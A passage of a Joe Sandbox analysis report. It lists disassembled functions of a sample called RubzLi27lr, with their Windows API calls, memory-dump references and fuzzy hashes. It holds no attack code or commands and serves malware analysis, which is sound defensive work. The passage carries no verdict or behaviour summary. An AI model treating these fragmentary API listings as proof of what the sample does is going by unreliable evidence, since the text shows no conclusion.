                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1352324309-0
                                                                                                                  • Opcode ID: 92d6373567db93aa65038cc37fd6711191c95867d17149de5baf08cce2f59117
                                                                                                                  • Instruction ID: 449cef0312ce811526f9d1420e977c73c6270a145cbf0e500cb2de9704a9ddde
                                                                                                                  • Opcode Fuzzy Hash: 92d6373567db93aa65038cc37fd6711191c95867d17149de5baf08cce2f59117
                                                                                                                  • Instruction Fuzzy Hash: 3A118EB52463109BE7208F14ED48BD27FFCEB00B00F5085A9A656D7251DF70EA84DB90
                                                                                                                  Function 00B1B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B1ACD3,?,00008000), ref: 00B1B0C4
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B1ACD3,?,00008000), ref: 00B1B0E9
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00B1ACD3,?,00008000), ref: 00B1B0F3
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B1ACD3,?,00008000), ref: 00B1B126
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2875609808-0
                                                                                                                  • Opcode ID: 4bca52cf58e55a57f85b51667d2243dbc20e8ad6b399b86ae49937cef7d8076a
                                                                                                                  • Instruction ID: 622010cd27a902f985b749d96ef14e1cc9b21b0c63dc8e3347ff7686df5212a4
                                                                                                                  • Opcode Fuzzy Hash: 4bca52cf58e55a57f85b51667d2243dbc20e8ad6b399b86ae49937cef7d8076a
                                                                                                                  • Instruction Fuzzy Hash: 88113C31C01518E7CF009FE4E998AEEBFB8FF0A711F6140D5D951B3181CB3056908B51
                                                                                                                  Function 00B47E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00B47E33
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00B47E4B
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00B47E6F
                                                                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B47E8A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 357397906-0
                                                                                                                  • Opcode ID: a2d2ece6004c168b0929c7ded7021d66f693eae9dc2e31bdb759b9930e8b4b2e
                                                                                                                  • Instruction ID: 8f6d65e9b77d8e7e1a6ddd1be26b6c27fa0ccb7268509d4716b54d400cc95f12
                                                                                                                  • Opcode Fuzzy Hash: a2d2ece6004c168b0929c7ded7021d66f693eae9dc2e31bdb759b9930e8b4b2e
                                                                                                                  • Instruction Fuzzy Hash: 3D1156B9D0020AAFDB41CF98C8849EEBBF9FF09310F509156E915E3210D735AA54CF50
                                                                                                                  Function 00B12DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B12DC5
                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B12DD6
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00B12DDD
                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B12DE4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2710830443-0
                                                                                                                  • Opcode ID: 9756e0e69bf12f5d35ef524ff4c3520d9a457fb23303cc98a4abdf02651bba81
                                                                                                                  • Instruction ID: e2f9f542e641647a40aed78caf299a24aebef76323229b1b62003bbfd18de48e
                                                                                                                  • Opcode Fuzzy Hash: 9756e0e69bf12f5d35ef524ff4c3520d9a457fb23303cc98a4abdf02651bba81
                                                                                                                  • Instruction Fuzzy Hash: C0E06D752022287ADB201BA2EC0DEEB3EACFB43FA1F514065B505D30809EA08A80C6B0
                                                                                                                  Function 00B48863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AC9693
                                                                                                                    • Part of subcall function 00AC9639: SelectObject.GDI32(?,00000000), ref: 00AC96A2
                                                                                                                    • Part of subcall function 00AC9639: BeginPath.GDI32(?), ref: 00AC96B9
                                                                                                                    • Part of subcall function 00AC9639: SelectObject.GDI32(?,00000000), ref: 00AC96E2
                                                                                                                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00B48887
                                                                                                                  • LineTo.GDI32(?,?,?), ref: 00B48894
                                                                                                                  • EndPath.GDI32(?), ref: 00B488A4
                                                                                                                  • StrokePath.GDI32(?), ref: 00B488B2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1539411459-0
                                                                                                                  • Opcode ID: ce0f08216f237933ae89493fb14f07ac9f6eb97c80c23222b304d63dee02e47b
                                                                                                                  • Instruction ID: 071f5599872c680063f930632b176e7d072766bcb424fcac5140fe384f31df32
                                                                                                                  • Opcode Fuzzy Hash: ce0f08216f237933ae89493fb14f07ac9f6eb97c80c23222b304d63dee02e47b
                                                                                                                  • Instruction Fuzzy Hash: 2DF03A3A042258BADB125F98AC09FCE3F59AF06710F048140FA11661E2CB755612DBA9
                                                                                                                  Function 00AC98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetSysColor.USER32(00000008), ref: 00AC98CC
                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00AC98D6
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00AC98E9
                                                                                                                  • GetStockObject.GDI32(00000005), ref: 00AC98F1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$ModeObjectStockText
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4037423528-0
                                                                                                                  • Opcode ID: 72fec19e6634c4548ef52a19530e1e17fc0069abb633d16f570c36d7b373cae7
                                                                                                                  • Instruction ID: 9f3883ebcbdadfc122143945da9124bb6bd8c5ab8edbdb6b6b6694c2e79d6c34
                                                                                                                  • Opcode Fuzzy Hash: 72fec19e6634c4548ef52a19530e1e17fc0069abb633d16f570c36d7b373cae7
                                                                                                                  • Instruction Fuzzy Hash: 00E0ED35680280AAEB200B74AC09BEC3F60FB12B32F048219F6FA690E1CB7147408B10
                                                                                                                  Function 00B1162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00B11634
                                                                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B111D9), ref: 00B1163B
                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B111D9), ref: 00B11648
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B111D9), ref: 00B1164F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3974789173-0
                                                                                                                  • Opcode ID: 99e883c99bb69a73461d179fc0901653edbb9155b5d8404de54beb915e996d1d
                                                                                                                  • Instruction ID: 3e250f367cef4c17787f65a5cad12ed93de9437ef3e08a464a99a828fb3492fc
                                                                                                                  • Opcode Fuzzy Hash: 99e883c99bb69a73461d179fc0901653edbb9155b5d8404de54beb915e996d1d
                                                                                                                  • Instruction Fuzzy Hash: 93E04F356022119BD7A01FA49D0DB863FA8FF46B91F144848F245CA090DA7445808B54
                                                                                                                  Function 00B0D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDesktopWindow.USER32 ref: 00B0D858
                                                                                                                  • GetDC.USER32(00000000), ref: 00B0D862
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B0D882
                                                                                                                  • ReleaseDC.USER32(?), ref: 00B0D8A3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2889604237-0
                                                                                                                  • Opcode ID: 1e9bd676b044e8657228c12ca11d435c59a582a9a7d58703d3897c88a2568854
                                                                                                                  • Instruction ID: f29624f6170f2dcdd265aef62ae45f0357fb1eb66f328d976ce39a0025382ab8
                                                                                                                  • Opcode Fuzzy Hash: 1e9bd676b044e8657228c12ca11d435c59a582a9a7d58703d3897c88a2568854
                                                                                                                  • Instruction Fuzzy Hash: 79E01AB8801204DFCB819FA0D908A6DBFB5FB09710F11C059F806E7260CB388A01EF40
                                                                                                                  Function 00B0D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDesktopWindow.USER32 ref: 00B0D86C
                                                                                                                  • GetDC.USER32(00000000), ref: 00B0D876
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B0D882
                                                                                                                  • ReleaseDC.USER32(?), ref: 00B0D8A3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2889604237-0
                                                                                                                  • Opcode ID: 96df5f62abb1959dac55337fbcefefef842cc1d65426ab94c4c70ed06e62c24f
                                                                                                                  • Instruction ID: 610d1e5ac67dc95c225c313c09f46919b1a6ef8e70bdc557adc03af072e7621d
                                                                                                                  • Opcode Fuzzy Hash: 96df5f62abb1959dac55337fbcefefef842cc1d65426ab94c4c70ed06e62c24f
                                                                                                                  • Instruction Fuzzy Hash: 4CE092B9801204EFCB91AFA4D908A6DBFB5BB09B11B159459F94AE7260CB385A01EF50
                                                                                                                  Function 00B24D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB7620: _wcslen.LIBCMT ref: 00AB7625
                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00B24ED4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Connection_wcslen
                                                                                                                  • String ID: *$LPT
                                                                                                                  • API String ID: 1725874428-3443410124
                                                                                                                  • Opcode ID: e1b4dbb7c736d367d382926359834b428ba80ee18d4cce614bddf54c1eda911d
                                                                                                                  • Instruction ID: 7a187c0b3ca284cdc7b7fad6120589972d87515bb868f22ac5a54329776109c6
                                                                                                                  • Opcode Fuzzy Hash: e1b4dbb7c736d367d382926359834b428ba80ee18d4cce614bddf54c1eda911d
                                                                                                                  • Instruction Fuzzy Hash: 77917C75A002149FCB14DF58D584EAABBF5EF88304F1980D9E80E9B7A2C771ED85CB90
                                                                                                                  Function 00ACE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: #
                                                                                                                  • API String ID: 0-1885708031
                                                                                                                  • Opcode ID: 8bb1534c911b76961dbf11988c8ec5936bf23d2a24791bbb7592e8f1f4dae7e2
                                                                                                                  • Instruction ID: efcfb8abb5546cf7f7d4f0cc02ba14dce9e7bc858a83262ad72cc3c6e65e7d77
                                                                                                                  • Opcode Fuzzy Hash: 8bb1534c911b76961dbf11988c8ec5936bf23d2a24791bbb7592e8f1f4dae7e2
                                                                                                                  • Instruction Fuzzy Hash: 315100755002469FDF15DF68C081BFA7FE8EF25310F248499E8A19B2D1DA34DD42CBA0
                                                                                                                  Function 00ACF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00ACF2A2
                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00ACF2BB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 2783356886-2766056989
                                                                                                                  • Opcode ID: c0f1988d151eacad0669bf30ba89a454da0bc95cff2bda1bf92a167ba999d738
                                                                                                                  • Instruction ID: 0b27dc426897d40191d3ff41e8834d38e6651479f6c288899c677765d0c44fab
                                                                                                                  • Opcode Fuzzy Hash: c0f1988d151eacad0669bf30ba89a454da0bc95cff2bda1bf92a167ba999d738
                                                                                                                  • Instruction Fuzzy Hash: B85137714087449BD320AF14DD86BAFBBFCFB84710F81885DF1D942196EB718529CB66
                                                                                                                  Function 00B35745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00B357E0
                                                                                                                  • _wcslen.LIBCMT ref: 00B357EC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper_wcslen
                                                                                                                  • String ID: CALLARGARRAY
                                                                                                                  • API String ID: 157775604-1150593374
                                                                                                                  • Opcode ID: 14c17ecf0c36dbbb2e7dd9930914a87db3e5ca4eb76c2f932dd28f153369f5b2
                                                                                                                  • Instruction ID: dd4e127d3bbea6f2b1d85d7fe7f6f5861c575fc1ef3f135eaa63c4120becefda
                                                                                                                  • Opcode Fuzzy Hash: 14c17ecf0c36dbbb2e7dd9930914a87db3e5ca4eb76c2f932dd28f153369f5b2
                                                                                                                  • Instruction Fuzzy Hash: 1D419275E002099FCB14DFA9C9819FEBBF9FF59310F2040A9E515A7252E7309D81CB90
                                                                                                                  Function 00B2D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00B2D130
                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B2D13A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CrackInternet_wcslen
                                                                                                                  • String ID: |
                                                                                                                  • API String ID: 596671847-2343686810
                                                                                                                  • Opcode ID: 9c86bf30696d40cb38449e0161409bd264ba2576a383528c42bed77e75fc5af3
                                                                                                                  • Instruction ID: d979c8d66ad179288b443698b3becacf5b23719ace3a5e136d1f2019a810ec88
                                                                                                                  • Opcode Fuzzy Hash: 9c86bf30696d40cb38449e0161409bd264ba2576a383528c42bed77e75fc5af3
                                                                                                                  • Instruction Fuzzy Hash: F6313D71D00219ABCF15EFA5DD85AEEBFB9FF04300F100059F819B61A2E735AA16CB50
                                                                                                                  Function 00B4356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00B43621
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B4365C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                  • String ID: static
                                                                                                                  • API String ID: 2139405536-2160076837
                                                                                                                  • Opcode ID: 1628d49b2f7d3e4bc5f264a86ba29cb8e9ab3395ab4eb220ad89eefaeaa36fb7
                                                                                                                  • Instruction ID: 41c9df10f3c93116ab648b7cc1b917cc797c7bcc2e2da2abd135b562a8c5ac0c
                                                                                                                  • Opcode Fuzzy Hash: 1628d49b2f7d3e4bc5f264a86ba29cb8e9ab3395ab4eb220ad89eefaeaa36fb7
                                                                                                                  • Instruction Fuzzy Hash: D9319C71100204AEDB109F38DC81EFB77E9FF98B20F058619F8A597290DA30AE91E760
